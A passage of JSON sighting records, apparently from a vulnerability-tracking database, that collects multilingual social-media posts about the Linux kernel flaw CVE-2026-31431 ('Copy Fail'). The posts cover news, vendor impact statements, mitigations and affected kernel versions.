"12938e02-e884-4e2b-8e2c-a76ceccbf3ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://vulnerability.circl.lu/comment/015dc7f6-33e1-49b4-af56-d27f0111165a", "content": "", "creation_timestamp": "2026-04-30T10:07:37.566466Z"}, {"uuid": "4921249e-f608-47dd-97c5-1bde251f66ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/egghat.mastodon.social.ap.brid.gy/post/3mkpejaxv75w2", "content": "Oops.\n\n\u201eIf your kernel was built between 2017 and the patch \u2014 which covers essentially every mainstream Linux distribution \u2014 you're in scope.\u201c\n\nCopy Fail \u2014 CVE-2026-31431 https://copy.fail/\n#BadNews", "creation_timestamp": "2026-04-30T10:06:38.752696Z"}, {"uuid": "d5e51604-ebc9-4aaa-bae2-901046fc723b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mueritz98.bsky.social/post/3mkpepdc5l22p", "content": "This blog from #XintCode Research Team is absolut brilliant! Their #CopyFail exploit on CVE-2026-31431 is simply fascinating. A must read detail on their description of the route to \"732 Bytes to #Root on Every Major #Linux Distribution\" #Cyber #CVE \n\nxint.io/blog/copy-fa...", "creation_timestamp": "2026-04-30T10:10:00.533494Z"}, {"uuid": "333fa63b-b55a-4202-b1f7-36db7ad8cc08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/theitnerd.ca/post/3mkq4jiyuei27", "content": "Copy Fail Linux vuln allows root\u00a0access\n\nYesterday, Theori disclosed\u00a0CVE-2026-31431, dubbed\u00a0Copy Fail, a Linux kernel vulnerability that allows any unprivileged local user to gain root access on virtually every major Linux distribution shipped since 2017. In the Linux kernel, the following\u2026", "creation_timestamp": "2026-04-30T17:16:11.893065Z"}, {"uuid": "61a600d7-a1c8-4327-ab32-42e4ee057c60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq4l6u2tt2v", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T17:17:08.483737Z"}, {"uuid": "1cd8e428-b107-4e4c-9381-037cd9e44fa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/epowo-uzata.mast.qixto.com.ap.brid.gy/post/3mkq4lw5cy6h2", "content": "Kopiointi ep\u00e4onnistui: Linux-ytimen LPE mahdollistaa roottauksen 10-rivisell\u00e4 Python-skriptill\u00e4 CVE-2026-31431, nimelt\u00e4\u00e4n Copy Fail, hy\u00f6dynt\u00e4\u00e4 Linux-ytimen authencesn\n\nhttps://www.theregister.com/2026/04/30/linux_cryptographic_code_flaw/", "creation_timestamp": "2026-04-30T17:17:35.781060Z"}, {"uuid": "2844e5af-2b39-4e6b-ab9f-0515c93b64cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/upsun.com/post/3mkq4pfzpkc25", "content": "We are aware of the recently disclosed copy.fail vulnerability (CVE-2026-31431) and want to assure our customers that Upsun systems are not affected. The module targeted by this vulnerability is disabled in our platform. There is no risk of exploitation, and no action is required on your part. \u2728 1/3", "creation_timestamp": "2026-04-30T17:19:30.654806Z"}, {"uuid": "3f000655-74b6-4996-8059-06894783b4f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/upsun.com/post/3mkq4pfzugk25", "content": "We are aware of the recently disclosed copy.fail vulnerability (CVE-2026-31431) and want to assure our customers that Upsun systems are not affected. The module targeted by this vulnerability is disabled in our platform. There is no risk of exploitation, and no action is required on your part. \u2728 1/3", "creation_timestamp": "2026-04-30T17:19:31.836980Z"}, {"uuid": "918da6db-9d1c-43ae-8c03-5e4a738b3564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/derdreschi84.bsky.social/post/3mkq55flkes2g", "content": "Copy Fail #Linux Kernel Flaw Allows Local Users to Gain Root\n\nCopy Fail (CVE-2026-31431) is a Linux kernel vulnerability that allows local unprivileged users to gain root access on affected systems.", "creation_timestamp": "2026-04-30T17:27:22.813945Z"}, {"uuid": "e61d4343-1a2e-46e3-84c9-9e7b8c5d689f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/potato.software/post/3mkq56enhxs25", "content": "Critical #LinuxKernel vulnerability 'Copy Fail' (CVE-2026-31431) grants root access across major distributions since 2017. Immediate patching recommended. #PotatoSecurity #Linux #Vulnerability Link: thedailytechfeed.com/critical-lin...", "creation_timestamp": "2026-04-30T17:27:51.979284Z"}, {"uuid": "58c3d55f-ef25-42ce-ba5e-d4f1fcc086aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq5ojctew2x", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T17:36:54.031232Z"}, {"uuid": "0fb4a576-9a5f-4295-a3ed-3dbb415d9959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq755f5zn2s", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T18:02:58.518756Z"}, {"uuid": "d2dfd964-b2e7-40ef-a926-71e36332e656", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ciq.com/post/3mkq77seepu2m", "content": "CVE-2026-31431 (Copy Fail) is a Linux kernel privilege escalation vulnerability with a public exploit now in the wild. It affects Rocky Linux 8, 9, and 10.\nHere is how CIQ is responding. kb.ciq.com/article/rock...", "creation_timestamp": "2026-04-30T18:04:29.411014Z"}, {"uuid": "188366c0-9671-453e-9d60-f54b8161f9a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3mkperxdnzkx2", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431 Article URL: https://github.com/NorskHelsenett/copy-fail-destroyer Comments URL: https://news.ycombinator.com/item?id=47960232 Points: 1 # Co...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T10:11:29.000132Z"}, {"uuid": "5be6d455-e9c0-4488-9512-0e62aee958d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkpey2aqeq2s", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nhttps://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-04-30T10:14:52.493977Z"}, {"uuid": "dd8738d1-2087-42a8-8f3d-24780f9812d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/securestep9.bsky.social/post/3mkoaiwjpj226", "content": "\u26a0\ufe0f #Linux: Major Linux distributions are impacted by a Privilege Escalation Vulnerability dubbed \"CopyFail\" (CVE-2026-31431) which sat undetected since 2017. \nA 732-byte Python script allows any user on Linux to become root:\n#CopyFail\n#LPE\n\ud83d\udc47\nwww.cyberkendra.com/2026/04/a-73...", "creation_timestamp": "2026-04-29T23:22:09.951889Z"}, {"uuid": "da04b6c3-b37e-43de-8aca-fda1fc93cdc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3mkq7nqpalqs2", "content": "Copy Fail Linux vuln allows root access Yesterday, Theori disclosed CVE-2026-31431, dubbed Copy Fail, a Linux kernel vulnerability that allows any unprivileged local user to gain root access on v...\n\n#Commentary #LINUX\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T18:12:22.516785Z"}, {"uuid": "bc5d2ec3-8fce-4251-bf14-6c1eebae96e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3mkq7pa5sr72q", "content": "The 'Copy Fail' vulnerability (CVE-2026-31431) has been silently giving hackers root access on Linux since 2017. This isn't just another bug; it's a fundamental challenge to container security. Find out how it works and why patching is\u2026\n\nhttps://www.tpp.blog/2i0m9zn\n\n#opensource #linux #copyfail", "creation_timestamp": "2026-04-30T18:13:06.894998Z"}, {"uuid": "584ac4ce-fd94-4ae6-bdf9-91e37238d8c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbot.bsky.social/post/3mkq7ujxok52e", "content": "Some notes on Copy Fail or CVE-2026-31431, found by Xint Code (\nhttps://\nxint.io/blog/copy-fail\n-linux-distributions\n\u2026). This is a very stable and very straightforward exploit. It worked almost on anything I tested and in some cases,\u2026\n\n\u2014 from @craiu (https://x.com/craiu/status/2049810338577584637)", "creation_timestamp": "2026-04-30T18:16:03.739777Z"}, {"uuid": "6e96c342-9915-4ad3-b66a-98a7a4fe1019", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/vukinaj.bsky.social/post/3mkqbxeavm22f", "content": "Tak #update, p\u0159\u00e1tel\u00e9. \n\n#CopyFail a sledovan\u00fd jako CVE-2026-31431\n\n#Linux \n\ncybernews.com/security/cri...", "creation_timestamp": "2026-04-30T18:53:30.868666Z"}, {"uuid": "4bb6f500-376f-48c2-805c-3663298354ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mkqcfbtk7v2x", "content": "CVE-2026-31431: The 732-Byte Linux Rootkit That Hid for 9 Years \u2013 Update Now! +\u00a0Video\n\nIntroduction: A recently disclosed Linux kernel vulnerability, CVE-2026-31431, allows any local user to gain root access using a mere 732-byte Python script. This flaw has remained undetected in all major Linux\u2026", "creation_timestamp": "2026-04-30T19:01:15.769263Z"}, {"uuid": "f3c802fc-4aa8-4192-abb0-2628993aa5f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mkpf4u2awz27", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u300cCopy Fail\u300d\u30ed\u30b8\u30c3\u30af\u6b20\u9665\u304c\u30b7\u30b9\u30c6\u30e0\u4e57\u3063\u53d6\u308a\u3092\u53ef\u80fd\u306b\u3059\u308b\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u9ad8\u91cd\u5ea6\u30ed\u30b8\u30c3\u30af\u30d0\u30b0\u306b\u3088\u308a\u3001\u6a29\u9650\u306e\u306a\u3044\u653b\u6483\u8005\u304c\u4ed6\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u30e1\u30e2\u30ea\u306b\u30b3\u30fc\u30c9\u3092\u66f8\u304d\u8fbc\u3093\u3067root\u30b7\u30a7\u30eb\u3092\u53d6\u5f97\u3067\u304d\u308b\u3068\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4f01\u696dTheori\u304c\u5831\u544a\u3057\u3066\u3044\u307e\u3059\u3002 CVE-2026-31431\uff08CSS\u30b9\u30b3\u30a27.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3001Copy Fail\u3068\u547c\u3070\u308c\u308b\u3053\u306e\u554f\u984c\u306f\u30012017\u5e74\u4ee5\u964d\u306e\u3059\u3079\u3066", "creation_timestamp": "2026-04-30T10:17:31.438988Z"}, {"uuid": "4c0e5339-bd39-44bb-83c5-a662e6f61d16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3mkpfjfo7dj2b", "content": "CVE-2026-31431 (Copy Fail) detection toolkit \u2014 auditd, eBPF, Sigma, YARA", "creation_timestamp": "2026-04-30T10:24:32.420194Z"}, {"uuid": "462bf239-cb9b-4fa0-a6a6-38d4aab94afd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Atirut.toot.community.ap.brid.gy/post/3mkpfmr4vdq22", "content": "PSA for sysadmins: https://master.almalinux-org.pages.dev/blog/2026-04-30-cve-2026-31431-copy-fail/\n\nTL;DR anyone with an unpriviledged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.\n\n#sysadmin #Linux #psa #cve", "creation_timestamp": "2026-04-30T10:26:30.628454Z"}, {"uuid": "aa4dbe63-f37a-4367-90b3-3755ff3280c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/me.social.k3can.us.ap.brid.gy/post/3mkpgawanojw2", "content": "CVE-2026-31431. A logic flaw in `authencesn` appears to enable privilege escalation on nearly every #Linux distro between 2017 and now.\n\n#CopyFail \u2014 CVE-2026-31431\nhttps://copy.fail/\n\nhttps://github.com/theori-io/copy-fail-CVE-2026-31431/issues", "creation_timestamp": "2026-04-30T10:37:48.891785Z"}, {"uuid": "91cd157d-aed2-4fd5-a9ab-fb56315cc33d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3mkqdbcrscg2o", "content": "A critical Linux kernel vulnerability (CVE-2026-31431) allowing local privilege escalation, introduced in kernel 4.14, has been fixed in versions 6.18.22, 6.19.12, and 7.0. Older long-term kernels are still vulnerable as the fix does not apply cleanly.", "creation_timestamp": "2026-04-30T19:16:53.240764Z"}, {"uuid": "9b17677e-e848-4150-8b70-e5f81547fbac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yukotan.bsky.social/post/3mkoaolbcpc2x", "content": "\u5168\u3066\u306e\u30c7\u30a3\u30b9\u30c8\u30ea\u3067\u5f71\u97ff\u304c\u3042\u308b\u30bc\u30ed\u30c7\u30a4\u306e\u8106\u5f31\u6027\u304c\u898b\u3064\u304b\u3063\u305f\u305d\u3046\u3067\u3059\u3002\u7279\u6a29\u6607\u683c\u304c\u53ef\u80fd\u3067\u3059\u3002\n\nCopy Fail \u2014 CVE-2026-31431 \ncopy.fail", "creation_timestamp": "2026-04-29T23:25:22.929541Z"}, {"uuid": "a4494b32-9a9a-49ff-8934-edd693964a45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sinologic.net/post/3mkqebri5iq2b", "content": "Copy Fail (CVE-2026-31431): la IA encuentra un exploit de 732 bytes que da root en cualquier Linux desde 2017\n\nUn fallo l\u00f3gico en el subsistema criptogr\u00e1fico del kernel de Linux lleva casi un\u2026\n\n#copy_fail #CVE #exploit #IA #Inteligencia_Artificial #kernel #Linux #root #Seguridad #vulnerabilidad", "creation_timestamp": "2026-04-30T19:35:04.686926Z"}, {"uuid": "904ec88d-b967-4d89-8af0-50693178ba96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newstecnicas.info.ve/post/3mkqeqxlstc2w", "content": "\ud83d\udc27 \u00bfC\u00f3mo funciona 'Copy Fail'? El #exploit de 732 bytes que otorga acceso #Root en #Linux (CVE-2026-31431) (+MITIGACI\u00d3N) www.newstecnicas.info.ve/2026/04/copy...", "creation_timestamp": "2026-04-30T19:43:58.426836Z"}, {"uuid": "c75d0467-44d0-42a3-a63d-4bd852152809", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/techimo.bsky.social/post/3mkpj7jyqhu22", "content": "Linux kernel \"Copy Fail\" (CVE-2026-31431) vulnerability found! Unprivileged local users can write 4 bytes to file page cache. Exploit: python script alters setuid binaries for root access. Also affects containers. Fix: Revert 2017 optimization. Source: xint.io", "creation_timestamp": "2026-04-30T11:30:36.711223Z"}, {"uuid": "291a2775-e8aa-44a6-8a27-819cab5198ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3mkpjirtdvh22", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431\nL: https://github.com/NorskHelsenett/copy-fail-destroyer\nC: https://news.ycombinator.com/item?id=47960232\nposted on 2026.04.30 at 05:49:59 (c=0, p=4)", "creation_timestamp": "2026-04-30T11:35:47.032738Z"}, {"uuid": "e7842974-7a3d-42b3-8e7a-097bcfdcaa0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mkpjjqwgwj2h", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431\nDiscussion | hackernews | Author: evenh", "creation_timestamp": "2026-04-30T11:36:19.452406Z"}, {"uuid": "0a31b12d-0d9e-41e3-81a6-23e34aeaa48a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/echobit.de/post/3mkpkcqm44c2n", "content": "Aktuell kursieren Meldungen zur Linux-Schwachstelle CVE-2026-31431 (\u201eCopy Fail\u201c). Die Darstellung wirkt teils sehr alarmistisch \u2013 deshalb kurz die Einordnung:\n\nJa, es handelt sich um eine echte Sicherheitsl\u00fccke im Kernel (betreffend u. a. das algif_aead-Modul).", "creation_timestamp": "2026-04-30T11:50:18.121733Z"}, {"uuid": "e366ed11-f7bc-46f9-ab24-5fdc5a9d797c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/helpnetsecurity.com/post/3mkpkefy2fs2y", "content": "Nine-year-old Linux kernel flaw enables reliable local privilege escalation (CVE-2026-31431)\n\n\ud83d\udcd6 Read more: www.helpnetsecurity.com/2026/04/30/c...\n\n#cybersecurity #cybersecuritynews #containers #PoC #Linux", "creation_timestamp": "2026-04-30T11:51:17.075644Z"}, {"uuid": "45632110-59ac-4faa-a811-d6e35576b9cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kirik.bsky.social/post/3mkpkr3reok24", "content": "\u7c21\u6f54\u304b\u3064\u4e0d\u53ef\u6b20\u306a\u3053\u3068\u306f\u5168\u90e8\u3053\u3053\u306b\u66f8\u3044\u3066\u3042\u308b\u304b\u3089\u307f\u3093\u306a\u8aad\u3093\u3067\u5373\u5bfe\u51e6\u3057\u307e\u3057\u3087\u3046\n\n\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01 @zephel01 \n\nnote.com/zephel01/n/n...", "creation_timestamp": "2026-04-30T11:58:33.055023Z"}, {"uuid": "daa5195a-86d3-46d9-85d0-b386f4d5895e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dougburks.bsky.social/post/3mkpksiwfvc2s", "content": "OhMyDebn 3.6.3 now available with Copy Fail CVE-2026-31431 exploit mitigation, OpenCode 1.14.30, and Aether 4.15.3!\n\nOhMyDebn is a debonair Linux desktop for power users. It gives you the stability of the Debian distro, the ease of use of the Cinnamon desktop, and the power of AI.", "creation_timestamp": "2026-04-30T11:59:09.244299Z"}, {"uuid": "9f97691f-a395-49db-b339-567c92c07a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mkplfrh76k2x", "content": "Lundi, je vous disais : le 4 mai, on optimise Linux ( en mode serveur). Debian, Ubuntu ou RedHat (et clones) installent trop de services par d\u00e9faut souvent inutiles. \n\nLa CVE-2026-31431 (Copy Fail) va rendre ce live int\u00e9ressant !\n\nRDV Lundi 20h : twitch.tv/adrienLinuxt...", "creation_timestamp": "2026-04-30T12:09:58.542805Z"}, {"uuid": "344d757f-c97f-446a-8cf7-120fb5d81869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/koki.me/post/3mkplmw6em52c", "content": "Codize Sandbox v0.11.0 \u30ea\u30ea\u30fc\u30b9\nCopy Fail (CVE-2026-31431) \u5bfe\u7b56\u3068\u3057\u3066 AF_ALG \u3075\u3055\u3044\u3069\u3044\u305f\ngithub.com/codize-dev/s...", "creation_timestamp": "2026-04-30T12:13:53.065515Z"}, {"uuid": "f4568781-c982-424b-b4e0-4e61157ede73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpnvt6mi3m2", "content": "CopyFail CVE-2026-31431 mitigation with open source tool In the link I explain: 1) Very shortly and easy to understand what is this new vulnerability 2) How I use owLSM which is a open-source Linux...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T12:54:48.349929Z"}, {"uuid": "95e14702-5895-498f-9238-a773fa7a7d65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/justgeekfr.bsky.social/post/3mkpoabxvbc2p", "content": "\ud83d\udea8 Copy Fail (CVE-2026-31431) : la faille Linux qui dormait depuis 9 ans\n\n\ud83d\udc49 www.justgeek.fr/copy-fail-cv...\n\n#Linux #Cybers\u00e9curit\u00e9 #CopyFail #S\u00e9curit\u00e9 #Kernel #Vuln\u00e9rabilit\u00e9", "creation_timestamp": "2026-04-30T13:00:31.969660Z"}, {"uuid": "f70233a3-0243-4f1d-adc4-b1db6fc7e0e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mkqfohaqiak2", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Copy Fail \u0432 \u044f\u0434\u0440\u0435 Linux \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root-\u0434\u043e\u0441\u0442\u0443\u043f Copy Fail (CVE-2026-31431) \u2014 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0434\u0440\u0435 Linux: ...\n\n#\u0422\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0438\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T20:00:08.499549Z"}, {"uuid": "367f0b6c-7ab3-454a-bed2-72f9ddf03716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/startuphub.bsky.social/post/3mkqfscmeil2i", "content": "Together AI details how it shut down the Copy Fail CVE-2026-31431 Linux kernel vulnerability, disabling a critical crypto socket interface to protect its AI infrastructure.\n\nhttps://www.startuphub.ai/ai-news/technology/2026/together-ai-halts-copy-fail-exploit", "creation_timestamp": "2026-04-30T20:02:11.191842Z"}, {"uuid": "2bc588cc-bb75-4548-aa4e-2a175290724d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Linux-Maintainers.activitypub.awakari.com.ap.brid.gy/post/3mkqfv57ht432", "content": "AL26-009 - Vulnerability Affecting Linux - CVE-2026-31431 Introduction to Malware Binary Triage (IMBT) Course Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor...\n\n#Malware #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T20:05:57.833691Z"}, {"uuid": "9e5ba3ff-d6d9-4fc4-9b9d-40c3e9adfaf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/billstatler.forum.statler.ws.ap.brid.gy/post/3mkqg2x3b4qo2", "content": "From CVE-2026-31431, the list of Linux kernel versions that are affected by the vulnerability:\n\n**affected**\n\u2022 affected at 4.14\n\n**unaffected**\n\u2022 unaffected from 0 before 4.14\n\u2022 unaffected from 5.10.254 through 5.10.*\n\u2022 unaffected from 5.15.204 through 5.15.*\n\u2022 unaffected from 6.1.170 through 6 